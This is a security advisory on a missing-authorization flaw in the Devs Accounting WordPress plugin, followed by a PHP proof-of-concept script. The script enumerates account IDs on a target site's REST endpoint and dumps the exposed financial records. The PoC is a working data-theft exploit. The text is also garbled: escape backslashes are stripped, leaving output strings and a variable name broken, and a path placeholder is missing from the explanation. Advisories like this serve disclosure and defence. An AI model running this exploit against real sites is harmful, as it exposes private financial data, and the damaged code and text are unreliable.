Atomic Edge analysis of CVE-2026-9175 (metadata-based): This vulnerability affects the Devs Accounting plugin for WordPress, version 1.2.0 and earlier. It exposes sensitive financial account data (account name, bank name, opening balance) to unauthenticated attackers via a REST API endpoint. The CVSS score is 5.3 (medium), but the impact is significant due to the disclosure of private accounting records.
Root Cause: The CWE-862 (Missing Authorization) and the vulnerability description indicate that the REST API callback function `get_single_account()` is registered with a `permission_callback` that unconditionally returns `true`. This is a confirmed pattern: WordPress REST API endpoints require a `permission_callback` parameter in `register_rest_route()`. When set to `__return_true` or a similar callable that always returns true, any unauthenticated visitor can access the endpoint. The endpoint path is `/devs-accounting/v1/get-account/`, where “ is a numeric account ID. The account ID is directly exposed and enumerable. This inference is based on the official CVE description; no source code was available for confirmation.
Exploitation: An attacker sends a GET request to the WordPress REST API at `/wp-json/devs-accounting/v1/get-account/1`, replacing the trailing digit with any numeric ID. The endpoint returns JSON containing the account name, bank name, and opening balance for that account. Because there is no authentication or authorization check, the attacker can iterate through account IDs (1, 2, 3, …) to extract all stored financial records. The attack requires no special privileges, user interaction, or complex payloads.
Remediation: The plugin developer must modify the `register_rest_route()` call to use a proper `permission_callback` that verifies the current user has the necessary capabilities (e.g., `manage_options` or a custom capability). The fix should check `current_user_can()` before returning account data. Since no patched version exists (per the CVE metadata), administrators should disable or remove the plugin until an update becomes available.
Impact: Exploitation leads to the disclosure of private financial account records, including account names, associated bank names, and opening balances. This information can be used for competitive intelligence, social engineering, or fraud. The attacker can enumerate all accounts in the system. The confidentiality of sensitive financial data is compromised, potentially violating data protection regulations and damaging the trust of the site owner and their clients.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-9175 - Devs Accounting <= 1.2.0 - Missing Authorization to Unauthenticated Sensitive Information Exposure via 'id' Parameter
// Configuration: change this to the target WordPress site URL
$target_url = 'http://example.com';
// REST API endpoint pattern
$endpoint = '/wp-json/devs-accounting/v1/get-account/';
// Iterate over likely account IDs (starting from 1)
for ($id = 1; $id <= 10; $id++) {
$request_url = rtrim($target_url, '/') . $endpoint . $id;
echo "[+] Fetching account ID: $idn";
echo " URL: $request_urln";
// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $request_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Allow self-signed certificates for testing
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'User-Agent: AtomicEdge-PoC/1.0',
'Accept: application/json'
));
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code === 200 && !empty($response)) {
$data = json_decode($response, true);
if ($data !== null && !empty($data)) {
echo " [+] Data retrieved successfully:n";
echo ' ' . json_encode($data, JSON_PRETTY_PRINT) . "nn";
} else {
echo " [-] Empty or invalid JSON responsenn";
}
} elseif ($http_code === 404) {
echo " [-] Account not found (404)nn";
break; // Stop enumeration once accounts are exhausted
} else {
echo " [-] HTTP $http_code - Endpoint may not exist or is blockednn";
break;
}
}
echo "[+] PoC complete.n";
